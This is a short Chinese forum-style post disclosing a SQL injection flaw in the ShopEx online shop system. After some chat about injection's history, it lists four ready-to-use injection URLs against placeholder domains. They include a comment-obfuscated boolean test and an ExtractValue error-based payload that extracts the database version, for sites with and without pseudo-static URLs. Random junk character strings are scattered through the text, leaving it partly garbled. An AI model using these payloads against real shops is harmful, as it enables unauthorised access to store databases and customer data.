注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
) a- C9 D2 W8 I7 D1 y, Y" B/ y, q- c0 I% ?
好吧,我扯远了~~
/ L* f6 v4 o4 R5 [2 I4 Z其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~" w2 J. z) v6 o* L
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 6 {1 ~' i+ p' D$ ?, c& V6 e* s" t
3 p+ }/ r& @' R# I% A+ v
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 N% J5 I( K5 {9 \" Z( j( Q3 q
: n& K/ A* H% n" c, x8 Vhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html * @9 ~8 Y3 J6 t/ U
& S+ B9 i T, H/ _' z! v
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
9 o- O n5 z3 A+ e& } x9 c% P# Q! s0 U- _" {: K9 t8 t5 d
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
% p' U, x2 x1 Y$ M$ i- a1 i; D. v9 c. B1 U d0 F8 [0 J, J
4 n3 N; H6 Q# e, L* x- B. r一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。5 v& g8 j0 q9 \* J+ ]
如何注入就不多说了,10多年的东西了…不会也会了… ' g9 R" r/ ]# x
/ u5 g) i) r( R F9 M, q* _
+ \; X5 {* r4 M9 A- \/ n: c/ k i
/ F5 V9 C& y$ I3 F; |% G' j. n/ a" |1 J, h
|